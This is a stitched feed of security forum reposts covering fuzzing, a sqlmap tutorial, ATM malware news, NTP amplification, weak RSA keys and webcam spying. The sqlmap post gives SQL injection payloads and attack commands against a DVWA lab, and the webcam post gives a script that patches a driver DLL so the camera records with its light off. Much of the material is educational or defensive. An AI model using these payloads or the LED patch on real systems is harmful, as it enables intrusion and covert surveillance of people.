There are a number of things you can do to measure or improve the quality of your fuzzing. While these are all good things to keep in mind, you may not need to bother with them all if you are already getting lots of unique crashes within a useful timeframe.

Speed

Possibly one of the most important factors in fuzzing is speed. How many test cases per second/minute can you run? Sensible values will of course depend on the target, but the more test cases you can execute, the more likely you will be to find a crash in a given time period. Fuzzing is random, so every test case is like a lottery ticket, and you want as many of them as you can get. There are lots of things you can do to increase the speed of your test cases, such as improving the efficiency of your generation or mutation routines, parallelising test cases, decreasing timeouts or running programs in “headless” modes where they do not display a GUI. And of course, if you want to, you can simply buy faster kit!

Categorising crashes

Finding crashes is of course only the start of the process. Once you find a crashing test case, you will need to analyse it, work out what the bug is and either fix it or write an exploit for it, depending on your motivation. If you have thousands of crashing test cases, this can be quite daunting. By categorising crashes you can prioritise them according to which ones are most interesting to you. This can also help you identify when one test case is triggering the same bug as another, so you only keep the cases relating to unique crashes. In order to do this, you will need some automated information about the crash so you can make a decision. Running the test case with the target attached to a debugger can provide a crash trace which you can parse to find values such as the exception type, register values, stack contents and so on.
One tool by Microsoft which can help with this is called !exploitable (pronounced “bang exploitable”), which works with the WinDbg debugger to categorise crashes according to how exploitable it thinks the bug is.

Test case reduction

As fuzzing randomly alters input, it is common for a crashing test case to have multiple alterations which are not relevant to triggering the bug. Test case reduction is the act of narrowing down a test case to the minimum set of alterations from a valid input required to trigger the bug, so that you only need to focus on that part of the input in your analysis. This reduction can be performed manually, but it can also be performed automatically by the fuzzer. When a crashing test case is encountered, the fuzzer can re-execute the test case several times, gradually reducing the alterations made to the input until the smallest set of changes remains, whilst still triggering the bug. This can simplify your analysis and may also help to categorise crashing test cases, as you will know precisely what parts of the input are affected.

Code coverage

Code coverage is a measure of how much of the program’s code has been executed by the fuzzer. The idea is that the more coverage you get, the more of the program you have actually tested. Measuring code coverage can be tricky and often requires binary instrumentation to track which portions of code are being executed. You can also measure code coverage in different ways, such as by line, by basic block, by branch or by code path.

Code coverage is not a perfect measure with regards to fuzzing, as it is possible to execute code without revealing bugs in it, and there are often areas of code that almost never get executed, such as safety error checks that are unlikely to really be needed and are very unlikely to be interesting to us anyway. Nevertheless, some form of code coverage measurement can provide insight into what your fuzzer is triggering within the program, especially when your fuzzing is completely black box and you may not yet know much about the program’s inner workings. Some tools and technologies that may help with code coverage include Pai Mei, Valgrind, DynamoRIO and DTrace.

Fuzzing frameworks

There are a number of existing frameworks that allow you to create fuzzers without having to work from scratch. Some of these frameworks are complex, and it may still take a while to create a working fuzzer for your target; by contrast, others take a very simple approach. A selection of these frameworks and fuzzers is listed here for your reference:

Radamsa: designed to be easy to use and flexible. It attempts to “just work” for a variety of input types and contains a number of different fuzzing algorithms for mutation.

Sulley: provides a comprehensive generation framework, allowing structured data to be represented for generation-based fuzzing. It also contains components to help with recording test cases and detecting crashes.

Peach: the Peach framework can perform smart fuzzing for file formats and network protocols. It can perform both generation- and mutation-based fuzzing, and it contains components to help with modelling and monitoring the target.

SPIKE: a network protocol fuzzer. It requires good knowledge of C to use and is designed to run on Linux.

Grinder: a web browser fuzzer, which also has features to help in managing large numbers of crashes.
NodeFuzz: a Node.js-based harness for web browsers, which includes instrumentation modules to gain further information from the client side.

Sursa: https://www.mwrinfosecurity.com/knowledge-centre/15-minute-guide-to-fuzzing/
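To round off the guide, a minimal harness combining the interfacing and crash-detection ideas above (process disappearance and timeout), assuming a target that takes the test case path as a command-line argument; paths and limits are illustrative:

[code]
import subprocess

def run_case(target: str, case_path: str, timeout: float = 5.0) -> str:
    """Run one test case; classify the result as 'ok', 'crash' or 'hang'.

    On POSIX, a process killed by a fatal signal reports a negative
    return code (e.g. -11 for SIGSEGV), which we treat as a crash.
    """
    try:
        proc = subprocess.run([target, case_path], timeout=timeout,
                              stdout=subprocess.DEVNULL,
                              stderr=subprocess.DEVNULL)
    except subprocess.TimeoutExpired:
        return "hang"        # unresponsive: restart and keep fuzzing
    if proc.returncode < 0:  # terminated by a signal
        return "crash"       # re-run under a debugger for a trace
    return "ok"

# Illustrative usage with a hypothetical target binary:
print(run_case("./target", "testcase.png"))
[/code]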
-
[h=2]Web Shell: PHP Meterpreter[/h]

Sursa: Web Shell: PHP Meterpreter
-
Meet Parrot Security OS (a Linux Distro) – Pentesting in the cloud!

By Henry Dalziel, Information Security Blogger

Many of our regular readers and Hacker Hotshot community know by now that we enjoy covering news on Linux pentesting distros, and whilst the heavy hitters such as Kali Linux and BackBox tend to get most of the limelight, we particularly like exposing upcoming distros, and here is one certainly worth blogging about: Parrot Security OS.

Linux penetration testing distros (call them hacking distros if you want) basically revolve around the same premise, i.e. storing 'best of breed' pentesting tools within an easy-to-use operating system that is efficiently updated. Now, the interesting thing about Parrot Security OS is that the team behind it have a novel way of using the cloud to manage the OS. We have to be honest in that we are not entirely sure how the cloud pentesting distro concept works – and for that reason we'd be grateful if any readers could chime in and drop a comment below to help improve this post.

Here's what we do know about this distro, which does give the feeling that it is packing a punch. First off, it is based on Debian GNU/Linux mixed with Frozenbox OS and Kali Linux, to, in their own words, 'provide the best penetration and security testing experience.' Certainly, taking the Debian Kali Linux route is a smart move, since it is a tried and tested platform that offers reliability.

Another thing we do know is that the design of the distro, as you would expect from a bunch of Italian pentesters, looks very slick and easy on the eye – and let's be honest, that is important, because if you are anything like us you are spending too much time in front of your monitors. Of interest, and on the subject of Italy, we note that there are several IT security distros that hail from Italy, namely BackBox and CAINE (which is actually more of a forensics distro).

Learn more and get a copy of Parrot 0.6 here.

Pentesting in the cloud

This does intrigue us, as does how it can be applied to a penetration tester's operating system. Does the OS fit into a particular cloud service model? As per the National Institute of Standards and Technology (NIST SP 800-145) definition, there are three cloud service models:

- Infrastructure as a Service (IaaS): the provider supplies hardware and network connectivity. The tenant, on the other hand, is responsible for the virtual machine and the software stack that operates within it.
- Platform as a Service (PaaS): the tenant supplies the web or database application (for example) that they would like to deploy, and the provider supplies all the necessary components required to run the app.
- Software as a Service (SaaS): the last category, whereby the provider supplies the app and all the components necessary for its operation. SaaS is meant to be a 'quick fix' for the tenant.

In Summary

We might be way off the mark here – and if we are – please let us know by dropping a comment below. We will be keeping an eye on Parrot Security OS, so please consider this your first introduction to what looks like a promising project, and don't forget where you heard it first! On the subject of penetration distros, we had an interesting Hacker Hotshot presentation from Andrew Hoog in which he discussed 'How To Turn BYOD Risk Into Mobile Security Strength'.
The reason we bring that up is that Andrew is the co-founder of viaForensics and co-developer of Santoku, a distro that focuses on mobile forensics – another niche and interesting area of IT security. We wish the Parrot (Frozenbox) team all the best and look forward to hearing how the project develops.

Sursa: Meet Parrot Security OS (a Linux Distro) - Pentesting in the cloud!
-
Sqlmap Tricks for Advanced SQL Injection

Sqlmap is an awesome tool that automates SQL Injection discovery and exploitation processes. I normally use it for exploitation only, because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points.

Basics

Using sqlmap for classic SQLi is very straightforward:

./sqlmap.py -u 'http://mywebsite.com/page.php?vulnparam=hello'

The target URL after the -u option includes a parameter vulnerable to SQLi (vulnparam). Sqlmap will run a series of tests and detect it very quickly. You can also explicitly tell sqlmap to only test specific parameters with the -p option. This is useful when the query contains various parameters and you don't want sqlmap to test everything. You can use the --data option to pass any POST parameters.

To maximize successful detection and exploitation, I usually use the --headers option to pass a valid User-Agent header (from my browser, for example). Finally, the --cookie option is used to specify any useful cookie along with the queries (e.g. a session cookie).

Advanced Attack

Sometimes sqlmap cannot find tricky injection points, and some configuration tweaks are needed. In this example, I will use the Damn Vulnerable Web App (DVWA - Damn Vulnerable Web Application), a deliberately insecure web application used for educational purposes. It uses PHP and a MySQL database. I also customized the source code to simulate a complex injection point. Here is the source of the PHP file responsible for the Blind SQL Injection exercise, located at /[install_dir]/dvwa/vulnerabilities/sqli_blind/source/low.php:

[phpcode]<?php
if (isset($_GET['Submit'])) {
    // Retrieve data
    $id = $_GET['id'];
    if (!preg_match('/-BR$/', $id))
        $html .= '<pre><h2>Wrong ID format</h2></pre>';
    else {
        $id = str_replace("-BR", "", $id);
        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result = mysql_query($getid); // Removed 'or die' to suppress mysql errors
        $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind'
        if ($num > 0)
            $html .= '<pre><h2>User exists!</h2></pre>';
        else
            $html .= '<pre><h2>Unknown user!</h2></pre>';
    }
}
?>[/phpcode]

Basically, this code will receive an ID composed of a numerical value followed by the string "-BR". The application will first validate whether this string is present and will extract the numerical value. Then, it concatenates this value to the SQL query used to check if it is a valid user ID and returns the result ("User exists!" or "Unknown user!").

This page is clearly vulnerable to SQL Injection, but due to the string manipulation routine before the actual SQL command, sqlmap is unable to find it:

./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1-BR&Submit=Submit#' --level=5 --risk=3 -p id

I'm using a valid User-Agent and an authenticated session cookie. I'm also forcing sqlmap to test the "id" parameter with the -p option. Even when I set the level and risk of tests to their maximum, sqlmap is not able to find it. To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix.
This is a typical Blind SQL Injection instance, and I'm lazy, so I don't want to exploit it manually. For more information about this kind of SQLi, please check this link: https://www.owasp.org/index.php/Blind_SQL_Injection.

http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=1+%23-BR&Submit=Submit#
http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=0+%23-BR&Submit=Submit#

Note that we are URL-encoding special characters because the parameter is located in the URL. The decoded string is:

id=1' AND 1=1 #-BR

Sqlmap Tweaking

How do we force sqlmap to inject there? Well, the first idea is to use the --suffix option with the value "-BR" and set "id=1" in the query. It will force sqlmap to add this value after every query. Let's try it with debug information (the -v3 option):

./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 --risk=3 -p id --suffix="-BR" -v3

I'm still not having any luck. To check what's going on, we can increase the debug level or set the --proxy="http://localhost:8080" option to point to your favorite web proxy. It appears sqlmap does not add comments when a suffix is passed on the command line, so every query looks like this: id=1' AND 1=0 -BR. Obviously, it is not working. Below is how you should handle this situation.

The file located at "sqlmap/xml/payloads.xml" contains all the tests sqlmap will perform. It is an XML file, and you can add your own tests to it. As this is a boolean-based blind SQLi instance, I am using the test called "AND boolean-based blind - WHERE or HAVING clause (MySQL comment)" as a template and modifying it. Here is the new test I added to my payloads.xml file:

[Images: existing user ID, non-existing user ID, a valid query (True), a non-valid query (False)]

<test>
    <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title>
    <stype>1</stype>
    <level>1</level>
    <risk>1</risk>
    <clause>1</clause>
    <where>1</where>
    <vector>AND [INFERENCE] #</vector>
    <request>
        <payload>AND [RANDNUM]=[RANDNUM] #</payload>
    </request>
    <response>
        <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison>
    </response>
    <details>
        <dbms>MySQL</dbms>
    </details>
</test>

This test simply forces the use of the # character (the MySQL comment) in every payload. The original test was using the <comment> tag as a sub-tag of the <request> tag. As we saw, that does not work with suffixes. Now we explicitly want this special character included at the end of every request, before the "-BR" suffix. A detailed description of the available options is included in the payloads.xml file, but here is a summary of the settings I used:

- <title>: the title... duh.
- <stype>: the type of test; 1 means boolean-based blind SQL injection.
- <level>: the level of this test, set to 1 (can be set to anything you want as long as you set the right --level option on the command line).
- <risk>: the risk of this test (like the <level> tag, it can be set to anything you want as long as you set the right --risk option on the command line).
- <clause>: in which clause this will work; 1 means WHERE or HAVING clauses.
- <where>: where to insert the payload; 1 means appending the payload to the parameter's original value.
- <vector>: the payload used for exploitation, also used to check if the injection point is a false positive.
- <request>: the payload that will be injected and should trigger a True condition (e.g. ' AND 1=1 #). Here the sub-tag <payload> has to be used.
- <response>: the payload that will be injected and should trigger a False condition (e.g. ' AND 1=0 #). Here the sub-tag <comparison> has to be used.
- <details>: sets the database in use: MySQL. Here the sub-tag <dbms> has to be used.

Let's see if this works:

[Image: sqlmap output]

Great! Now we can easily exploit this with sqlmap. sqlmap is a very powerful and highly customizable tool; I really recommend it if you're not already using it. It can save you a lot of time during a penetration test.

Posted by Christophe De La Fuente on 30 December 2013

Sursa: Sqlmap Tricks for Advanced SQL Injection - SpiderLabs
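As a sanity check before tweaking sqlmap at all, the boolean-based condition from the post can be verified with a few lines of Python. The URL, the "-BR" suffix and the session cookie below are the ones used in the article; everything else is illustrative:

[code]
import requests

BASE = "http://localhost/dvwa/vulnerabilities/sqli_blind/"
COOKIES = {"security": "low", "PHPSESSID": "oikbs8qcic2omf5gnd09kihsm7"}

def user_exists(injection: str) -> bool:
    """True if the page answers 'User exists!' for the injected id."""
    params = {"id": f"1{injection}-BR", "Submit": "Submit"}
    r = requests.get(BASE, params=params, cookies=COOKIES)
    return "User exists!" in r.text

# A true condition should behave differently from a false one:
print(user_exists("' AND 1=1 #"))   # expect True
print(user_exists("' AND 1=0 #"))   # expect False
[/code]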
-
Cash machines raided with infected USB sticks

By Chris Vallance, BBC Radio 4

Researchers have revealed how cyber-thieves sliced into cash machines in order to infect them with malware earlier this year. The criminals cut the holes in order to plug in USB drives that installed their code onto the ATMs. Details of the attacks on an unnamed European bank's cash dispensers were presented at the hacker-themed Chaos Computing Congress in Hamburg, Germany. The crimes also appear to indicate that the thieves mistrusted each other. The two researchers who detailed the attacks have asked for their names not to be published.

Access code

The thefts came to light in July after the lender involved noticed several of its ATMs were being emptied despite their use of safes to protect the cash inside. After surveillance was increased, the bank discovered the criminals were vandalising the machines to use the infected USB sticks.

[Image: the malware was installed onto the ATMs via USB sticks]

Once the malware had been transferred, they patched the holes up. This allowed the same machines to be targeted several times without the hack being discovered. To activate the code at the time of their choosing, the thieves typed in a 12-digit code that launched a special interface. Analysis of software installed onto four of the affected machines demonstrated that it displayed the amount of money available in each denomination of note and presented a series of menu options on the ATM's screen to release each kind. The researchers said this allowed the attackers to focus on the highest-value banknotes in order to minimise the amount of time they were exposed.

But the crimes' masterminds appeared to be concerned that some of their gang might take the drives and go solo. To counter this risk, the software required the thief to enter a second code in response to numbers shown on the ATM's screen before they could release the money. The correct response varied each time, and the thief could only obtain the right code by phoning another gang member and telling them the numbers displayed. If they did nothing, the machine would return to its normal state after three minutes.

The researchers added that the organisers displayed "profound knowledge of the target ATMs" and had gone to great lengths to make their malware code hard to analyse. However, they added that the approach did not extend to the software's filenames - the key one was called hack.bat.

Sursa: BBC News - Cash machines raided with infected USB sticks
-
Defcon 21 - Evolving Exploits Through Genetic Algorithms

Description: This talk will discuss the next logical step from dumb fuzzing to breeding exploits via machine learning and evolution. Using genetic algorithms, this talk will take simple SQL exploits and breed them into precision tactical weapons. Stop looking at SQL error messages and carefully crafting injections: let genetic algorithms take over and create lethal exploits to PWN sites for you! (A toy sketch of the evolutionary loop follows below.)

soen (@soen_vanned) is a reverse engineer and exploit developer for the hacking team V&. As a member of the team, he has participated in and won Open Capture the Flag at DEF CON 16, 18, and 19. soen also participated in the DDTEK competition at DEF CON 20. 0xSOEN@blogspot.com

For more information please visit: https://www.defcon.org/html/defcon-21/dc-21-speakers.html

Source: Defcon 21 - Evolving Exploits Through Genetic Algorithms
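The abstract does not spell out the mechanics, but the core of any such approach is a standard evolutionary loop: score candidate payloads, keep the best, then recombine and mutate them. The sketch below is purely illustrative; the alphabet, parameters and the offline fitness function are invented stand-ins (a real harness would score payloads by sending them to a target and diffing the responses, as the talk describes).

    # Toy genetic-algorithm loop for evolving injection strings.
    import random

    ALPHABET = list("'\"()=- #;abcdefORAND10")
    POP_SIZE, GENERATIONS, MUTATION_RATE = 50, 100, 0.1

    def random_individual(length=12):
        return "".join(random.choice(ALPHABET) for _ in range(length))

    def fitness(payload):
        # Placeholder fitness: reward SQL-ish tokens. A real harness would
        # score error strings, timing deltas or page diffs from the target.
        return sum(payload.count(tok) for tok in ("'", "OR", "=", "#"))

    def crossover(a, b):
        cut = random.randrange(1, min(len(a), len(b)))
        return a[:cut] + b[cut:]

    def mutate(ind):
        chars = list(ind)
        for i in range(len(chars)):
            if random.random() < MUTATION_RATE:
                chars[i] = random.choice(ALPHABET)
        return "".join(chars)

    population = [random_individual() for _ in range(POP_SIZE)]
    for _ in range(GENERATIONS):
        population.sort(key=fitness, reverse=True)
        parents = population[: POP_SIZE // 2]  # truncation selection
        children = [mutate(crossover(random.choice(parents),
                                     random.choice(parents)))
                    for _ in range(POP_SIZE - len(parents))]
        population = parents + children

    print(max(population, key=fitness))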
-
Attackers Wage Network Time Protocol-Based DDoS Attacks
Kelly Jackson Higgins

Attackers have begun exploiting an oft-forgotten network protocol in a new spin on distributed denial-of-service (DDoS) attacks, as researchers spotted a spike in so-called NTP reflection attacks this month.

The Network Time Protocol, or NTP, syncs time between machines on the network and runs over port 123 UDP. It's typically configured once by network administrators and often is not updated, according to Symantec, which discovered a major jump in attacks via the protocol over the past few weeks.

"NTP is one of those set-it-and-forget-it protocols that is configured once and most network administrators don't worry about it after that. Unfortunately, that means it is also not a service that is upgraded often, leaving it vulnerable to these reflection attacks," says Allan Liska, a Symantec researcher, in a blog post last week.

Attackers appear to be employing NTP for DDoSing in a manner similar to the way DNS is abused in such attacks: they transmit small spoofed packets requesting that a large amount of data be sent to the DDoS target's IP address. According to Symantec, it's all about abusing the so-called "monlist" command in an older version of NTP. Monlist returns a list of the last 600 hosts that have connected to the server.

"For attackers the monlist query is a great reconnaissance tool. For a localized NTP server it can help to build a network profile. However, as a DDoS tool, it is even better because a small query can redirect megabytes worth of traffic," Liska explains in the post. Monlist modules can be found in NMAP as well as in Metasploit, for example; Metasploit includes a monlist DDoS exploit module.

The spike in NTP reflection attacks occurred mainly in mid-December, with close to 15,000 IPs affected, and dropped off significantly after December 23, according to Symantec's data.

Symantec recommends that organizations update their NTP implementations to version 4.2.7, which does not use the monlist command. Another option is to disable access to monlist in older versions of NTP. "By disabling monlist, or upgrading so the command is no longer there, not only are you protecting your network from unwanted reconnaissance, but you are also protecting your network from inadvertently being used in a DDoS attack," Liska says.

Source: Attackers Wage Network Time Protocol-Based DDoS Attacks -- Dark
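To check whether one of your own servers exposes the issue described above, a small probe is enough: send the well-known NTP mode-7 MON_GETLIST_1 request and see whether anything comes back. A minimal sketch follows; treat the exact byte layout as an assumption, and only point this at NTP servers you administer.

    # Check whether an NTP server you own answers monlist queries.
    # 8-byte mode-7 request: implementation 3, request code 42 (0x2a).
    import socket

    MONLIST_PROBE = b"\x17\x00\x03\x2a" + b"\x00" * 4

    def responds_to_monlist(host, port=123, timeout=3):
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.settimeout(timeout)
        try:
            s.sendto(MONLIST_PROBE, (host, port))
            data, _ = s.recvfrom(4096)
            # Any reply at all means the amplification vector is open;
            # a patched or properly configured server stays silent.
            return len(data) > 0
        except socket.timeout:
            return False
        finally:
            s.close()

    if __name__ == "__main__":
        print(responds_to_monlist("ntp.example.org"))  # hypothetical host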
-
Detection of Widespread Weak Keys in Network Devices

Abstract

RSA and DSA can fail catastrophically when used with malfunctioning random number generators, but the extent to which these problems arise in practice has never been comprehensively studied at Internet scale. We perform the largest ever network survey of TLS and SSH servers and present evidence that vulnerable keys are surprisingly widespread. We find that 0.75% of TLS certificates share keys due to insufficient entropy during key generation, and we suspect that another 1.70% come from the same faulty implementations and may be susceptible to compromise. Even more alarmingly, we are able to obtain RSA private keys for 0.50% of TLS hosts and 0.03% of SSH hosts, because their public keys shared nontrivial common factors due to entropy problems, and DSA private keys for 1.03% of SSH hosts, because of insufficient signature randomness. We cluster and investigate the vulnerable hosts, finding that the vast majority appear to be headless or embedded devices. In experiments with three software components commonly used by these devices, we are able to reproduce the vulnerabilities and identify specific software behaviors that induce them, including a boot-time entropy hole in the Linux random number generator. Finally, we suggest defenses and draw lessons for developers, users, and the security community.

Download

Download the conference version or the more detailed extended version.

@InProceedings{weakkeys12,
  author    = {Nadia Heninger and Zakir Durumeric and Eric Wustrow and J. Alex Halderman},
  title     = {Mining Your {P}s and {Q}s: {D}etection of Widespread Weak Keys in Network Devices},
  booktitle = {Proceedings of the 21st {USENIX} Security Symposium},
  month     = aug,
  year      = 2012
}

Source: https://factorable.net/paper.html
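The RSA result in the abstract rests on elementary arithmetic: if two moduli were generated with overlapping entropy and happen to share a prime, a plain GCD recovers that prime and breaks both keys. A toy illustration with tiny stand-in numbers (at survey scale the paper uses quasilinear product/remainder trees rather than naive pairwise GCDs):

    # If two RSA moduli share a prime factor, gcd() exposes it instantly.
    from math import gcd

    n1 = 101 * 103   # tiny stand-in moduli sharing the prime 101
    n2 = 101 * 107

    p = gcd(n1, n2)
    if p > 1:
        print("shared prime:", p)          # 101
        print("n1 =", p, "*", n1 // p)     # 101 * 103
        print("n2 =", p, "*", n2 // p)     # 101 * 107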
-
C. Then C++. Then whatever junk your heart desires.
-
Researchers Crack 4096-bit RSA Encryption With a Microphone
Nytro replied to Usr6's topic in Stiri securitate
Madmen. I like it. -
How to disable webcam light on Windows
By Robert Graham

In recent news, it was revealed the FBI has a "virus" that will record a suspect through the webcam secretly, without turning on the LED light. Some researchers showed this working on an older MacBook. In this post, we do it on Windows.

Hardware, firmware, driver, software

In theory, the indicator light should be a hardware function: when power is supplied to the sensor, it should also be supplied to an indicator light. This would make the light impossible to hack. However, I don't think anybody does this.

In some cases, it's a firmware function. Webcams have their own wimpy microprocessors and run code directly within the webcam; controlling the light is one of those firmware functions. Some, like Steve Jobs, might describe this as "hardware" control, because it resides wholly within the webcam hardware, but it's still a form of software. This is especially true because firmware blobs are unsigned, and therefore can be hacked.

In some cases, it's the driver: either the kernel-mode driver that interfaces at a low level with the hardware, or a DLL that interfaces at a high level with software.

How to

As reverse engineers, we simply grab these bits of software/firmware/drivers and open them in our reverse engineering tools, like IDA Pro. It doesn't take us long to find something to hack. For example, on our Dell laptop, we find the DLL that comes with the RealTek drivers for our webcam. We quickly zero in on the exported function "TurnOnOffLED()". We can quickly make a binary edit to this routine, causing it to return immediately without turning on the light. Dave shows this in the video below. First, the light turns on as normal; then he stops the webcam, replaces the DLLs with his modified ones, and turns on the webcam again. As the video shows, after the change the webcam is recording him recording the video, but the light is no longer on.

The deal with USB

Almost all webcams, even those inside your laptop's screen, are USB devices. There is a standard for USB video cameras, the UVC standard. This means most hardware will run under standard operating systems (Windows, Mac, Linux) without drivers from the manufacturer, at least enough to get Skype working. Only the more advanced features particular to each vendor need vendor-specific drivers.

According to this standard, the LED indicator light is controlled by the host software. The UVC utilities that come with Linux allow you to control this light directly with a command-line tool, making it possible to turn off the light while the camera is on. To hack this on Windows appears to require a filter driver. We are too lazy to write one, which is why we just hacked the DLLs in the demonstration above. We believe this is what the FBI has done: a filter driver for the UVC standard would cover most webcam products from different vendors, without the FBI having to write a custom hack for each vendor.

USB has lots of interesting features. It's designed with the idea that a person without root/administrator access may still want to plug in a device and use it. Therefore, there is the idea of "user-mode" drivers, where a non-administrator can nonetheless install drivers to access the USB device. This can be exploited with the Device Firmware Update (DFU) standard. It means that in many cases, in user mode, without administrator privileges, the firmware of the webcam can be updated. The researchers in the paper above demonstrate this with a 2008 MacBook, but in principle it should work on modern Windows 7 notebook computers as well, using most devices. The problem for a hacker is that they would have to build a hacked firmware for lots of different webcam chips. The upside is that they can do all of this without getting root/administrator access to the machine.

Conclusion

In the above video, Dave shows that the story of the FBI virus secretly enabling the webcam can work on at least one Windows machine. In our research we believe it can be done generically across almost any webcam, using almost any operating system.

Source: Errata Security: How to disable webcam light on Windows
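As an illustration of the DLL patch described above, here is a rough sketch that stamps a "ret" over the first byte of an exported function in a copy of a DLL, using the pefile library. The DLL filename follows the article's Dell/RealTek example but is an assumption, and note the calling-convention caveat: a real patch needs the disassembly work the article describes.

    # Sketch: patch an exported function in a copy of a DLL so it returns
    # immediately. DLL name is hypothetical; the export name is from the
    # article. NB: a bare 0xC3 (ret) only suits cdecl/no-arg functions; a
    # stdcall export taking N bytes of arguments needs "ret N" (C2 NN 00).
    import pefile

    DLL_IN  = "RtkCam.dll"           # hypothetical input file
    DLL_OUT = "RtkCam.patched.dll"
    EXPORT  = b"TurnOnOffLED"

    pe = pefile.PE(DLL_IN)
    rva = None
    for sym in pe.DIRECTORY_ENTRY_EXPORT.symbols:
        if sym.name == EXPORT:
            rva = sym.address        # RVA of the function body
            break
    if rva is None:
        raise SystemExit("export not found")

    offset = pe.get_offset_from_rva(rva)   # file offset of the function
    data = bytearray(open(DLL_IN, "rb").read())
    data[offset] = 0xC3                    # x86 "ret"
    open(DLL_OUT, "wb").write(bytes(data))
    print("patched %s at file offset 0x%x" % (EXPORT.decode(), offset))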
-
Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released
December 20th, 2013, 08:35 GMT · By Silviu Stahie

Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) has been released and is now available for download and testing. We prepared a screenshot tour to get a sneak peek at the new operating system.

The best news for fans of Ubuntu GNOME is that 14.04 will include a number of GNOME applications from the 3.10 stack. Also, the GNOME Classic session has been included; to try it, users just have to choose it from the Sessions option on the login screen.

"The Alpha 1 Trusty Tahr snapshot includes the 3.12.0.7 Ubuntu Linux kernel which is based on the upstream v3.12.4 Linux kernel. The 3.12 release contains improvements to the dynamic tick code, support infrastructure for DRM render nodes, TSO sizing and the FQ scheduler in the network layer, support for user namespaces in the XFS filesystem, multithreaded RAID5 in the MD subsystem, and more," reads the official announcement. Check it out for more details about this release.

Download Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only.

Source: Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released – Screenshot Tour
-
Exploit Protection for Microsoft Windows
By Guest Writer, posted 13 Dec 2013 at 05:52AM

Software exploits are an attack technique used by attackers to silently install various malware (such as Trojans or backdoors) on a user's computer without requiring social engineering to trick the victim into manually running a malicious program. Such malware installation through an exploit is invisible to the user and gives attackers an undeniable advantage. Exploits attempt to use vulnerabilities in particular operating system or application components in order to allow malware to execute.

In our previous blog post, titled Solutions to current antivirus challenges, we discussed several methods by which security companies can tackle the exploit problem. In this post, we provide more detail on the most exploited applications on Microsoft Windows platforms and advise a few steps users can (and should) take to further strengthen their defenses.

Exploitation Targets

The following applications are the ones most targeted by attackers through exploitation:

Web browsers (Microsoft Internet Explorer, Google Chrome, Apple Safari, Mozilla Firefox and others).
Plug-ins for browsers (Adobe Flash Player, Oracle Java, Microsoft Silverlight).
The Windows operating system itself, notably the Win32 subsystem driver win32k.sys.
Adobe Reader and Adobe Acrobat.
Other specific applications.

Different types of exploits are used in different attack scenarios. One of the most dangerous scenarios for an everyday user is the use of exploits by attackers to remotely install code into the operating system. In such cases, we usually find that the user has visited a compromised web resource and their system has been invisibly infected by malicious code (an attack often referred to as a "drive-by download"). If your computer is running a version of software such as a web browser or browser plug-ins that is vulnerable to exploitation, the chances of your system becoming infected with malware are very high due to the lack of mitigation from the software vendor.

In the case of specific targeted attacks, or attacks like a "watering hole" attack in which the attacker plants the exploit code on websites visited by the victim, the culprit can use zero-day (0-day) vulnerabilities in software or the operating system. Zero-day vulnerabilities are those that have not been patched by the vendor at the time they are being exploited by attackers.

Another common technique used in targeted attacks is to send the victim a PDF document "equipped" with an exploit. Social engineering is also often used, for example by selecting a filename and document content in such a way that the victim is likely to open it. While PDFs are first and foremost document files, Adobe has extended the file format to maximize its data exchange functionality by allowing scripting and the embedding of various objects into files, and this can be exploited by an attacker. While most PDF files are safe, some can be dangerous, especially if obtained from unreliable sources. When such a document is opened in a vulnerable PDF reader, the exploit code triggers the malicious payload (such as installation of a backdoor) and a decoy document is often opened.

Another target which attackers really love is Adobe Flash Player, as this plug-in is used for playback of content in all the different browsers. Like other software from Adobe, Flash Player is updated regularly, as advised by the company's updates (see Adobe Security Bulletins). Most of these vulnerabilities are of the Remote Code Execution (RCE) type, which indicates that attackers could use such a vulnerability to remotely execute malicious code on a victim's computer.

In relation to the browser and operating system, Java is a virtual machine (or runtime environment, the JRE) able to execute Java applications. Java applications are platform-independent, making Java a very popular tool: today Java is used by more than three billion devices. As with other browser plug-ins, misusing the Java plug-in is attractive to attackers, and given our previous experience of the malicious actions and vulnerabilities with which it is associated, we can say that as browser plug-ins go, Java represents one of the most dangerous components.

Also, various components of the Windows operating system itself can be used by attackers to remotely execute code or elevate privileges. The figure below shows the number of patches various Windows components received during 2013 (up until November).

Chart 1: Number of patches per component

The "Others" category includes vulnerabilities which were fixed in various operating system components (CSRSS, SCM, GDI, Print Spooler, XML Core Services, OLE, NFS, Silverlight, Remote Desktop Client, Active Directory, RPC, Exchange Server). This ranking shows that Internet Explorer had the largest number of vulnerabilities fixed: more than a hundred vulnerabilities across fourteen updates. Seven of the vulnerabilities had the status "being exploited in the wild at the time of patching", that is, they were being actively exploited by attackers.

The second most-patched component of the operating system is the infamous Windows subsystem driver win32k.sys. Vulnerabilities in this driver are used by attackers to escalate privileges on the system, for example to bypass restrictions imposed by User Account Control (UAC), a least-privilege mechanism introduced by Microsoft in Windows Vista to reduce the risk of compromise by an attack that requires administrator privileges.

Mitigation techniques

We now look in more detail at the most exploited applications and provide some steps that you can (and should) take to mitigate attacks and further strengthen your defenses.

Windows Operating System

